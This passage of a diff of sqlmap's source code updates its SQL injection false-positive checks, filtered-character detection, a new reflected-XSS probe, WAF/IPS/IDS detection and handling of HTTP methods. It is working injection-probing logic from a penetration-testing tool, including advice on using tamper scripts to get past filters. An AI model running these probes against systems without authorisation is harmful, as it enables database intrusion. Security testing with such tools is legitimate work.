randInt3 = max(randInt1, randInt2, randInt3)
|
||||||
|
|
||||||
while randInt1 >= randInt2:
|
if randInt3 > randInt2 > randInt1:
|
||||||
randInt2 = _()
|
break
|
||||||
|
|
||||||
while randInt2 >= randInt3:
|
|
||||||
randInt3 = _()
|
|
||||||
|
|
||||||
if not checkBooleanExpression("%d=%d" % (randInt1, randInt1)):
|
if not checkBooleanExpression("%d=%d" % (randInt1, randInt1)):
|
||||||
retVal = None
|
retVal = None
|
||||||
|
@ -668,15 +736,15 @@ def checkFalsePositives(injection):
|
||||||
if PAYLOAD.TECHNIQUE.BOOLEAN not in injection.data:
|
if PAYLOAD.TECHNIQUE.BOOLEAN not in injection.data:
|
||||||
checkBooleanExpression("%d=%d" % (randInt1, randInt2))
|
checkBooleanExpression("%d=%d" % (randInt1, randInt2))
|
||||||
|
|
||||||
if checkBooleanExpression("%d>%d" % (randInt1, randInt2)):
|
if checkBooleanExpression("%d=%d" % (randInt1, randInt3)):
|
||||||
retVal = None
|
retVal = None
|
||||||
break
|
break
|
||||||
|
|
||||||
elif checkBooleanExpression("%d>%d" % (randInt2, randInt3)):
|
elif checkBooleanExpression("%d=%d" % (randInt3, randInt2)):
|
||||||
retVal = None
|
retVal = None
|
||||||
break
|
break
|
||||||
|
|
||||||
elif not checkBooleanExpression("%d>%d" % (randInt3, randInt1)):
|
elif not checkBooleanExpression("%d=%d" % (randInt2, randInt2)):
|
||||||
retVal = None
|
retVal = None
|
||||||
break
|
break
|
||||||
|
|
||||||
|
@ -684,13 +752,6 @@ def checkFalsePositives(injection):
|
||||||
warnMsg = "false positive or unexploitable injection point detected"
|
warnMsg = "false positive or unexploitable injection point detected"
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
if PAYLOAD.TECHNIQUE.BOOLEAN in injection.data:
|
|
||||||
if all(_.__name__ != "between" for _ in kb.tamperFunctions):
|
|
||||||
warnMsg = "there is a possibility that the character '>' is "
|
|
||||||
warnMsg += "filtered by the back-end server. You can try "
|
|
||||||
warnMsg += "to rerun with '--tamper=between'"
|
|
||||||
logger.warn(warnMsg)
|
|
||||||
|
|
||||||
kb.injection = popValue()
|
kb.injection = popValue()
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
@ -701,35 +762,59 @@ def checkSuhosinPatch(injection):
|
||||||
"""
|
"""
|
||||||
|
|
||||||
if injection.place == PLACE.GET:
|
if injection.place == PLACE.GET:
|
||||||
|
debugMsg = "checking for parameter length "
|
||||||
|
debugMsg += "constrainting mechanisms"
|
||||||
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
pushValue(kb.injection)
|
pushValue(kb.injection)
|
||||||
|
|
||||||
kb.injection = injection
|
kb.injection = injection
|
||||||
randInt = randomInt()
|
randInt = randomInt()
|
||||||
|
|
||||||
if not checkBooleanExpression("%d=%s%d" % (randInt, ' ' * SUHOSIN_MAX_VALUE_LENGTH, randInt)):
|
if not checkBooleanExpression("%d=%s%d" % (randInt, ' ' * SUHOSIN_MAX_VALUE_LENGTH, randInt)):
|
||||||
warnMsg = "parameter length constraint "
|
warnMsg = "parameter length constrainting "
|
||||||
warnMsg += "mechanism detected (e.g. Suhosin patch). "
|
warnMsg += "mechanism detected (e.g. Suhosin patch). "
|
||||||
warnMsg += "Potential problems in enumeration phase can be expected"
|
warnMsg += "Potential problems in enumeration phase can be expected"
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
kb.injection = popValue()
|
kb.injection = popValue()
|
||||||
|
|
||||||
|
def checkFilteredChars(injection):
|
||||||
|
debugMsg = "checking for filtered characters"
|
||||||
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
|
pushValue(kb.injection)
|
||||||
|
|
||||||
|
kb.injection = injection
|
||||||
|
randInt = randomInt()
|
||||||
|
|
||||||
|
# all other techniques are already using parentheses in tests
|
||||||
|
if len(injection.data) == 1 and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data:
|
||||||
|
if not checkBooleanExpression("(%d)=%d" % (randInt, randInt)):
|
||||||
|
warnMsg = "it appears that some non-alphanumeric characters (i.e. ()) are "
|
||||||
|
warnMsg += "filtered by the back-end server. There is a strong "
|
||||||
|
warnMsg += "possibility that sqlmap won't be able to properly "
|
||||||
|
warnMsg += "exploit this vulnerability"
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
# inference techniques depend on character '>'
|
||||||
|
if not any(_ in injection.data for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.QUERY)):
|
||||||
|
if not checkBooleanExpression("%d>%d" % (randInt+1, randInt)):
|
||||||
|
warnMsg = "it appears that the character '>' is "
|
||||||
|
warnMsg += "filtered by the back-end server. You are strongly "
|
||||||
|
warnMsg += "advised to rerun with the '--tamper=between'"
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
kb.injection = popValue()
|
||||||
|
|
||||||
def heuristicCheckSqlInjection(place, parameter):
|
def heuristicCheckSqlInjection(place, parameter):
|
||||||
if kb.nullConnection:
|
if kb.nullConnection:
|
||||||
debugMsg = "heuristic checking skipped "
|
debugMsg = "heuristic check skipped because NULL connection used"
|
||||||
debugMsg += "because NULL connection used"
|
|
||||||
logger.debug(debugMsg)
|
|
||||||
return None
|
|
||||||
|
|
||||||
if wasLastResponseDBMSError():
|
|
||||||
debugMsg = "heuristic checking skipped "
|
|
||||||
debugMsg += "because original page content "
|
|
||||||
debugMsg += "contains DBMS error"
|
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
return None
|
return None
|
||||||
|
|
||||||
origValue = conf.paramDict[place][parameter]
|
origValue = conf.paramDict[place][parameter]
|
||||||
|
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
|
||||||
prefix = ""
|
prefix = ""
|
||||||
suffix = ""
|
suffix = ""
|
||||||
|
|
||||||
|
@ -741,18 +826,23 @@ def heuristicCheckSqlInjection(place, parameter):
|
||||||
suffix = conf.suffix
|
suffix = conf.suffix
|
||||||
|
|
||||||
randStr = ""
|
randStr = ""
|
||||||
|
|
||||||
while '\'' not in randStr:
|
while '\'' not in randStr:
|
||||||
randStr = randomStr(length=10, alphabet=HEURISTIC_CHECK_ALPHABET)
|
randStr = randomStr(length=10, alphabet=HEURISTIC_CHECK_ALPHABET)
|
||||||
|
|
||||||
|
kb.heuristicMode = True
|
||||||
|
|
||||||
payload = "%s%s%s" % (prefix, randStr, suffix)
|
payload = "%s%s%s" % (prefix, randStr, suffix)
|
||||||
payload = agent.payload(place, parameter, newValue=payload)
|
payload = agent.payload(place, parameter, newValue=payload)
|
||||||
page, _ = Request.queryPage(payload, place, content=True, raise404=False)
|
page, _ = Request.queryPage(payload, place, content=True, raise404=False)
|
||||||
|
|
||||||
|
kb.heuristicMode = False
|
||||||
|
|
||||||
parseFilePaths(page)
|
parseFilePaths(page)
|
||||||
result = wasLastResponseDBMSError()
|
result = wasLastResponseDBMSError()
|
||||||
|
|
||||||
infoMsg = "heuristic (basic) test shows that %s " % place
|
infoMsg = "heuristic (basic) test shows that %s parameter " % paramType
|
||||||
infoMsg += "parameter '%s' might " % parameter
|
infoMsg += "'%s' might " % parameter
|
||||||
|
|
||||||
def _(page):
|
def _(page):
|
||||||
return any(_ in (page or "") for _ in FORMAT_EXCEPTION_STRINGS)
|
return any(_ in (page or "") for _ in FORMAT_EXCEPTION_STRINGS)
|
||||||
|
@ -775,7 +865,7 @@ def heuristicCheckSqlInjection(place, parameter):
|
||||||
|
|
||||||
if casting:
|
if casting:
|
||||||
errMsg = "possible %s casting " % ("integer" if origValue.isdigit() else "type")
|
errMsg = "possible %s casting " % ("integer" if origValue.isdigit() else "type")
|
||||||
errMsg += "detected (e.g. \"$%s=intval($_REQUEST('%s'))\") " % (parameter, parameter)
|
errMsg += "detected (e.g. \"$%s=intval($_REQUEST['%s'])\") " % (parameter, parameter)
|
||||||
errMsg += "at the back-end web application"
|
errMsg += "at the back-end web application"
|
||||||
logger.error(errMsg)
|
logger.error(errMsg)
|
||||||
|
|
||||||
|
@ -793,6 +883,22 @@ def heuristicCheckSqlInjection(place, parameter):
|
||||||
infoMsg += "not be injectable"
|
infoMsg += "not be injectable"
|
||||||
logger.warn(infoMsg)
|
logger.warn(infoMsg)
|
||||||
|
|
||||||
|
kb.heuristicMode = True
|
||||||
|
|
||||||
|
value = "%s%s%s" % (randomStr(), DUMMY_XSS_CHECK_APPENDIX, randomStr())
|
||||||
|
payload = "%s%s%s" % (prefix, "'%s" % value, suffix)
|
||||||
|
payload = agent.payload(place, parameter, newValue=payload)
|
||||||
|
page, _ = Request.queryPage(payload, place, content=True, raise404=False)
|
||||||
|
|
||||||
|
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
|
||||||
|
|
||||||
|
if value in (page or ""):
|
||||||
|
infoMsg = "heuristic (XSS) test shows that %s parameter " % paramType
|
||||||
|
infoMsg += "'%s' might be vulnerable to XSS attacks" % parameter
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
kb.heuristicMode = False
|
||||||
|
|
||||||
return kb.heuristicTest
|
return kb.heuristicTest
|
||||||
|
|
||||||
def checkDynParam(place, parameter, value):
|
def checkDynParam(place, parameter, value):
|
||||||
|
@ -809,7 +915,9 @@ def checkDynParam(place, parameter, value):
|
||||||
dynResult = None
|
dynResult = None
|
||||||
randInt = randomInt()
|
randInt = randomInt()
|
||||||
|
|
||||||
infoMsg = "testing if %s parameter '%s' is dynamic" % (place, parameter)
|
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
|
||||||
|
|
||||||
|
infoMsg = "testing if %s parameter '%s' is dynamic" % (paramType, parameter)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
|
@ -817,7 +925,7 @@ def checkDynParam(place, parameter, value):
|
||||||
dynResult = Request.queryPage(payload, place, raise404=False)
|
dynResult = Request.queryPage(payload, place, raise404=False)
|
||||||
|
|
||||||
if not dynResult:
|
if not dynResult:
|
||||||
infoMsg = "confirming that %s parameter '%s' is dynamic" % (place, parameter)
|
infoMsg = "confirming that %s parameter '%s' is dynamic" % (paramType, parameter)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
randInt = randomInt()
|
randInt = randomInt()
|
||||||
|
@ -1009,52 +1117,38 @@ def checkWaf():
|
||||||
Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse
|
Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse
|
||||||
"""
|
"""
|
||||||
|
|
||||||
if not conf.checkWaf:
|
if any((conf.string, conf.notString, conf.regexp)):
|
||||||
return False
|
return None
|
||||||
|
|
||||||
infoMsg = "heuristic checking if the target is protected by "
|
dbmMsg = "heuristically checking if the target is protected by "
|
||||||
infoMsg += "some kind of WAF/IPS/IDS"
|
dbmMsg += "some kind of WAF/IPS/IDS"
|
||||||
logger.info(infoMsg)
|
logger.debug(dbmMsg)
|
||||||
|
|
||||||
retVal = False
|
retVal = False
|
||||||
|
payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD)
|
||||||
|
|
||||||
backup = dict(conf.parameters)
|
value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
|
||||||
|
value += agent.addPayloadDelimiters("%s=%s" % (randomStr(), payload))
|
||||||
|
|
||||||
conf.parameters = dict(backup)
|
try:
|
||||||
conf.parameters[PLACE.GET] = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + "&"
|
retVal = Request.queryPage(place=PLACE.GET, value=value, getRatioValue=True, noteResponseTime=False, silent=True)[1] < IDS_WAF_CHECK_RATIO
|
||||||
conf.parameters[PLACE.GET] += "%s=%d %s" % (randomStr(), randomInt(), IDS_WAF_CHECK_PAYLOAD)
|
except SqlmapConnectionException:
|
||||||
|
retVal = True
|
||||||
kb.matchRatio = None
|
finally:
|
||||||
Request.queryPage()
|
kb.matchRatio = None
|
||||||
|
|
||||||
if kb.errorIsNone and kb.matchRatio is None:
|
|
||||||
kb.matchRatio = LOWER_RATIO_BOUND
|
|
||||||
|
|
||||||
conf.parameters = dict(backup)
|
|
||||||
conf.parameters[PLACE.GET] = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + "&"
|
|
||||||
conf.parameters[PLACE.GET] += "%s=%d" % (randomStr(), randomInt())
|
|
||||||
|
|
||||||
trueResult = Request.queryPage()
|
|
||||||
|
|
||||||
if trueResult:
|
|
||||||
conf.parameters = dict(backup)
|
|
||||||
conf.parameters[PLACE.GET] = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + "&"
|
|
||||||
conf.parameters[PLACE.GET] += "%s=%d %s" % (randomStr(), randomInt(), IDS_WAF_CHECK_PAYLOAD)
|
|
||||||
|
|
||||||
falseResult = Request.queryPage()
|
|
||||||
|
|
||||||
if not falseResult:
|
|
||||||
retVal = True
|
|
||||||
|
|
||||||
conf.parameters = dict(backup)
|
|
||||||
|
|
||||||
if retVal:
|
if retVal:
|
||||||
warnMsg = "it appears that the target is protected. Please "
|
warnMsg = "heuristics detected that the target "
|
||||||
warnMsg += "consider usage of tamper scripts (option '--tamper')"
|
warnMsg += "is protected by some kind of WAF/IPS/IDS"
|
||||||
logger.warn(warnMsg)
|
logger.critical(warnMsg)
|
||||||
else:
|
|
||||||
infoMsg = "it appears that the target is not protected"
|
if not conf.identifyWaf:
|
||||||
logger.info(infoMsg)
|
message = "do you want sqlmap to try to detect backend "
|
||||||
|
message += "WAF/IPS/IDS? [y/N] "
|
||||||
|
output = readInput(message, default="N")
|
||||||
|
|
||||||
|
if output and output[0] in ("Y", "y"):
|
||||||
|
conf.identifyWaf = True
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
|
@ -1072,6 +1166,8 @@ def identifyWaf():
|
||||||
def _(*args, **kwargs):
|
def _(*args, **kwargs):
|
||||||
page, headers, code = None, None, None
|
page, headers, code = None, None, None
|
||||||
try:
|
try:
|
||||||
|
pushValue(kb.redirectChoice)
|
||||||
|
kb.redirectChoice = REDIRECTION.NO
|
||||||
if kwargs.get("get"):
|
if kwargs.get("get"):
|
||||||
kwargs["get"] = urlencode(kwargs["get"])
|
kwargs["get"] = urlencode(kwargs["get"])
|
||||||
kwargs["raise404"] = False
|
kwargs["raise404"] = False
|
||||||
|
@ -1079,6 +1175,8 @@ def identifyWaf():
|
||||||
page, headers, code = Request.getPage(*args, **kwargs)
|
page, headers, code = Request.getPage(*args, **kwargs)
|
||||||
except Exception:
|
except Exception:
|
||||||
pass
|
pass
|
||||||
|
finally:
|
||||||
|
kb.redirectChoice = popValue()
|
||||||
return page or "", headers or {}, code
|
return page or "", headers or {}, code
|
||||||
|
|
||||||
retVal = False
|
retVal = False
|
||||||
|
@ -1088,7 +1186,7 @@ def identifyWaf():
|
||||||
logger.debug("checking for WAF/IDS/IPS product '%s'" % product)
|
logger.debug("checking for WAF/IDS/IPS product '%s'" % product)
|
||||||
found = function(_)
|
found = function(_)
|
||||||
except Exception, ex:
|
except Exception, ex:
|
||||||
errMsg = "exception occured while running "
|
errMsg = "exception occurred while running "
|
||||||
errMsg += "WAF script for '%s' ('%s')" % (product, ex)
|
errMsg += "WAF script for '%s' ('%s')" % (product, ex)
|
||||||
logger.critical(errMsg)
|
logger.critical(errMsg)
|
||||||
|
|
||||||
|
@ -1110,9 +1208,10 @@ def identifyWaf():
|
||||||
if output and output[0] not in ("Y", "y"):
|
if output and output[0] not in ("Y", "y"):
|
||||||
raise SqlmapUserQuitException
|
raise SqlmapUserQuitException
|
||||||
else:
|
else:
|
||||||
infoMsg = "no WAF/IDS/IPS product has been identified"
|
warnMsg = "no WAF/IDS/IPS product has been identified"
|
||||||
logger.info(infoMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
kb.testType = None
|
||||||
kb.testMode = False
|
kb.testMode = False
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
@ -1168,10 +1267,16 @@ def checkNullConnection():
|
||||||
def checkConnection(suppressOutput=False):
|
def checkConnection(suppressOutput=False):
|
||||||
if not any((conf.proxy, conf.tor, conf.dummy)):
|
if not any((conf.proxy, conf.tor, conf.dummy)):
|
||||||
try:
|
try:
|
||||||
|
debugMsg = "resolving hostname '%s'" % conf.hostname
|
||||||
|
logger.debug(debugMsg)
|
||||||
socket.getaddrinfo(conf.hostname, None)
|
socket.getaddrinfo(conf.hostname, None)
|
||||||
except socket.gaierror:
|
except socket.gaierror:
|
||||||
errMsg = "host '%s' does not exist" % conf.hostname
|
errMsg = "host '%s' does not exist" % conf.hostname
|
||||||
raise SqlmapConnectionException(errMsg)
|
raise SqlmapConnectionException(errMsg)
|
||||||
|
except socket.error, ex:
|
||||||
|
errMsg = "problem occurred while "
|
||||||
|
errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getUnicode(ex))
|
||||||
|
raise SqlmapConnectionException(errMsg)
|
||||||
|
|
||||||
if not suppressOutput and not conf.dummy:
|
if not suppressOutput and not conf.dummy:
|
||||||
infoMsg = "testing connection to the target URL"
|
infoMsg = "testing connection to the target URL"
|
||||||
|
@ -1198,9 +1303,6 @@ def checkConnection(suppressOutput=False):
|
||||||
kb.errorIsNone = True
|
kb.errorIsNone = True
|
||||||
|
|
||||||
except SqlmapConnectionException, errMsg:
|
except SqlmapConnectionException, errMsg:
|
||||||
errMsg = getUnicode(errMsg)
|
|
||||||
logger.critical(errMsg)
|
|
||||||
|
|
||||||
if conf.ipv6:
|
if conf.ipv6:
|
||||||
warnMsg = "check connection to a provided "
|
warnMsg = "check connection to a provided "
|
||||||
warnMsg += "IPv6 address with a tool like ping6 "
|
warnMsg += "IPv6 address with a tool like ping6 "
|
||||||
|
@ -1210,6 +1312,9 @@ def checkConnection(suppressOutput=False):
|
||||||
singleTimeWarnMessage(warnMsg)
|
singleTimeWarnMessage(warnMsg)
|
||||||
|
|
||||||
if any(code in kb.httpErrorCodes for code in (httplib.NOT_FOUND, )):
|
if any(code in kb.httpErrorCodes for code in (httplib.NOT_FOUND, )):
|
||||||
|
errMsg = getUnicode(errMsg)
|
||||||
|
logger.critical(errMsg)
|
||||||
|
|
||||||
if conf.multipleTargets:
|
if conf.multipleTargets:
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
@ -1222,3 +1327,6 @@ def checkConnection(suppressOutput=False):
|
||||||
raise
|
raise
|
||||||
|
|
||||||
return True
|
return True
|
||||||
|
|
||||||
|
def setVerbosity(): # Cross-linked function
|
||||||
|
raise NotImplementedError
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -20,6 +20,7 @@ from lib.controller.checks import checkWaf
|
||||||
from lib.controller.checks import heuristicCheckSqlInjection
|
from lib.controller.checks import heuristicCheckSqlInjection
|
||||||
from lib.controller.checks import identifyWaf
|
from lib.controller.checks import identifyWaf
|
||||||
from lib.core.agent import agent
|
from lib.core.agent import agent
|
||||||
|
from lib.core.common import dataToStdout
|
||||||
from lib.core.common import extractRegexResult
|
from lib.core.common import extractRegexResult
|
||||||
from lib.core.common import getFilteredPageContent
|
from lib.core.common import getFilteredPageContent
|
||||||
from lib.core.common import getPublicTypeMembers
|
from lib.core.common import getPublicTypeMembers
|
||||||
|
@ -27,7 +28,10 @@ from lib.core.common import getUnicode
|
||||||
from lib.core.common import hashDBRetrieve
|
from lib.core.common import hashDBRetrieve
|
||||||
from lib.core.common import hashDBWrite
|
from lib.core.common import hashDBWrite
|
||||||
from lib.core.common import intersect
|
from lib.core.common import intersect
|
||||||
|
from lib.core.common import isListLike
|
||||||
from lib.core.common import parseTargetUrl
|
from lib.core.common import parseTargetUrl
|
||||||
|
from lib.core.common import popValue
|
||||||
|
from lib.core.common import pushValue
|
||||||
from lib.core.common import randomStr
|
from lib.core.common import randomStr
|
||||||
from lib.core.common import readInput
|
from lib.core.common import readInput
|
||||||
from lib.core.common import safeCSValue
|
from lib.core.common import safeCSValue
|
||||||
|
@ -54,6 +58,7 @@ from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||||
from lib.core.settings import EMPTY_FORM_FIELDS_REGEX
|
from lib.core.settings import EMPTY_FORM_FIELDS_REGEX
|
||||||
from lib.core.settings import IGNORE_PARAMETERS
|
from lib.core.settings import IGNORE_PARAMETERS
|
||||||
from lib.core.settings import LOW_TEXT_PERCENT
|
from lib.core.settings import LOW_TEXT_PERCENT
|
||||||
|
from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX
|
||||||
from lib.core.settings import HOST_ALIASES
|
from lib.core.settings import HOST_ALIASES
|
||||||
from lib.core.settings import REFERER_ALIASES
|
from lib.core.settings import REFERER_ALIASES
|
||||||
from lib.core.settings import USER_AGENT_ALIASES
|
from lib.core.settings import USER_AGENT_ALIASES
|
||||||
|
@ -124,8 +129,8 @@ def _selectInjection():
|
||||||
kb.injection = kb.injections[index]
|
kb.injection = kb.injections[index]
|
||||||
|
|
||||||
def _formatInjection(inj):
|
def _formatInjection(inj):
|
||||||
data = "Place: %s\n" % inj.place
|
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else inj.place
|
||||||
data += "Parameter: %s\n" % inj.parameter
|
data = "Parameter: %s (%s)\n" % (inj.parameter, paramType)
|
||||||
|
|
||||||
for stype, sdata in inj.data.items():
|
for stype, sdata in inj.data.items():
|
||||||
title = sdata.title
|
title = sdata.title
|
||||||
|
@ -144,7 +149,7 @@ def _formatInjection(inj):
|
||||||
vector = "%s%s" % (vector, comment)
|
vector = "%s%s" % (vector, comment)
|
||||||
data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
|
data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
|
||||||
data += " Title: %s\n" % title
|
data += " Title: %s\n" % title
|
||||||
data += " Payload: %s\n" % urldecode(payload, unsafe="&", plusspace=(inj.place == PLACE.POST and kb.postSpaceToPlus))
|
data += " Payload: %s\n" % urldecode(payload, unsafe="&", plusspace=(inj.place != PLACE.GET and kb.postSpaceToPlus))
|
||||||
data += " Vector: %s\n\n" % vector if conf.verbose > 1 else "\n"
|
data += " Vector: %s\n\n" % vector if conf.verbose > 1 else "\n"
|
||||||
|
|
||||||
return data
|
return data
|
||||||
|
@ -187,7 +192,9 @@ def _randomFillBlankFields(value):
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
def _saveToHashDB():
|
def _saveToHashDB():
|
||||||
injections = hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []
|
injections = hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True)
|
||||||
|
if not isListLike(injections):
|
||||||
|
injections = []
|
||||||
injections.extend(_ for _ in kb.injections if _ and _.place is not None and _.parameter is not None)
|
injections.extend(_ for _ in kb.injections if _ and _.place is not None and _.parameter is not None)
|
||||||
|
|
||||||
_ = dict()
|
_ = dict()
|
||||||
|
@ -249,7 +256,7 @@ def start():
|
||||||
return True
|
return True
|
||||||
|
|
||||||
if conf.url and not any((conf.forms, conf.crawlDepth)):
|
if conf.url and not any((conf.forms, conf.crawlDepth)):
|
||||||
kb.targets.add((conf.url, conf.method, conf.data, conf.cookie))
|
kb.targets.add((conf.url, conf.method, conf.data, conf.cookie, None))
|
||||||
|
|
||||||
if conf.configFile and not kb.targets:
|
if conf.configFile and not kb.targets:
|
||||||
errMsg = "you did not edit the configuration file properly, set "
|
errMsg = "you did not edit the configuration file properly, set "
|
||||||
|
@ -262,13 +269,16 @@ def start():
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
hostCount = 0
|
hostCount = 0
|
||||||
|
initialHeaders = list(conf.httpHeaders)
|
||||||
|
|
||||||
for targetUrl, targetMethod, targetData, targetCookie in kb.targets:
|
for targetUrl, targetMethod, targetData, targetCookie, targetHeaders in kb.targets:
|
||||||
try:
|
try:
|
||||||
conf.url = targetUrl
|
conf.url = targetUrl
|
||||||
conf.method = targetMethod
|
conf.method = targetMethod.upper() if targetMethod else targetMethod
|
||||||
conf.data = targetData
|
conf.data = targetData
|
||||||
conf.cookie = targetCookie
|
conf.cookie = targetCookie
|
||||||
|
conf.httpHeaders = list(initialHeaders)
|
||||||
|
conf.httpHeaders.extend(targetHeaders or [])
|
||||||
|
|
||||||
initTargetEnv()
|
initTargetEnv()
|
||||||
parseTargetUrl()
|
parseTargetUrl()
|
||||||
|
@ -276,7 +286,7 @@ def start():
|
||||||
testSqlInj = False
|
testSqlInj = False
|
||||||
|
|
||||||
if PLACE.GET in conf.parameters and not any([conf.data, conf.testParameter]):
|
if PLACE.GET in conf.parameters and not any([conf.data, conf.testParameter]):
|
||||||
for parameter in re.findall(r"([^=]+)=([^%s]+%s?|\Z)" % (conf.pDel or DEFAULT_GET_POST_DELIMITER, conf.pDel or DEFAULT_GET_POST_DELIMITER), conf.parameters[PLACE.GET]):
|
for parameter in re.findall(r"([^=]+)=([^%s]+%s?|\Z)" % (re.escape(conf.paramDel or "") or DEFAULT_GET_POST_DELIMITER, re.escape(conf.paramDel or "") or DEFAULT_GET_POST_DELIMITER), conf.parameters[PLACE.GET]):
|
||||||
paramKey = (conf.hostname, conf.path, PLACE.GET, parameter[0])
|
paramKey = (conf.hostname, conf.path, PLACE.GET, parameter[0])
|
||||||
|
|
||||||
if paramKey not in kb.testedParams:
|
if paramKey not in kb.testedParams:
|
||||||
|
@ -287,7 +297,13 @@ def start():
|
||||||
if paramKey not in kb.testedParams:
|
if paramKey not in kb.testedParams:
|
||||||
testSqlInj = True
|
testSqlInj = True
|
||||||
|
|
||||||
testSqlInj &= conf.hostname not in kb.vulnHosts
|
if testSqlInj and conf.hostname in kb.vulnHosts:
|
||||||
|
if kb.skipVulnHost is None:
|
||||||
|
message = "SQL injection vulnerability has already been detected "
|
||||||
|
message += "against '%s'. Do you want to skip " % conf.hostname
|
||||||
|
message += "further tests involving it? [Y/n]"
|
||||||
|
kb.skipVulnHost = readInput(message, default="Y").upper() != 'N'
|
||||||
|
testSqlInj = not kb.skipVulnHost
|
||||||
|
|
||||||
if not testSqlInj:
|
if not testSqlInj:
|
||||||
infoMsg = "skipping '%s'" % targetUrl
|
infoMsg = "skipping '%s'" % targetUrl
|
||||||
|
@ -300,13 +316,13 @@ def start():
|
||||||
if conf.forms:
|
if conf.forms:
|
||||||
message = "[#%d] form:\n%s %s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl)
|
message = "[#%d] form:\n%s %s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl)
|
||||||
else:
|
else:
|
||||||
message = "URL %d:\n%s %s%s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "")
|
message = "URL %d:\n%s %s%s" % (hostCount, HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "")
|
||||||
|
|
||||||
if conf.cookie:
|
if conf.cookie:
|
||||||
message += "\nCookie: %s" % conf.cookie
|
message += "\nCookie: %s" % conf.cookie
|
||||||
|
|
||||||
if conf.data is not None:
|
if conf.data is not None:
|
||||||
message += "\nPOST data: %s" % urlencode(conf.data) if conf.data else ""
|
message += "\n%s data: %s" % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST, urlencode(conf.data) if conf.data else "")
|
||||||
|
|
||||||
if conf.forms:
|
if conf.forms:
|
||||||
if conf.method == HTTPMETHOD.GET and targetUrl.find("?") == -1:
|
if conf.method == HTTPMETHOD.GET and targetUrl.find("?") == -1:
|
||||||
|
@ -316,13 +332,13 @@ def start():
|
||||||
test = readInput(message, default="Y")
|
test = readInput(message, default="Y")
|
||||||
|
|
||||||
if not test or test[0] in ("y", "Y"):
|
if not test or test[0] in ("y", "Y"):
|
||||||
if conf.method == HTTPMETHOD.POST:
|
if conf.method != HTTPMETHOD.GET:
|
||||||
message = "Edit POST data [default: %s]%s: " % (urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else "")
|
message = "Edit %s data [default: %s]%s: " % (conf.method, urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else "")
|
||||||
conf.data = readInput(message, default=conf.data)
|
conf.data = readInput(message, default=conf.data)
|
||||||
conf.data = _randomFillBlankFields(conf.data)
|
conf.data = _randomFillBlankFields(conf.data)
|
||||||
conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data
|
conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data
|
||||||
|
|
||||||
elif conf.method == HTTPMETHOD.GET:
|
else:
|
||||||
if targetUrl.find("?") > -1:
|
if targetUrl.find("?") > -1:
|
||||||
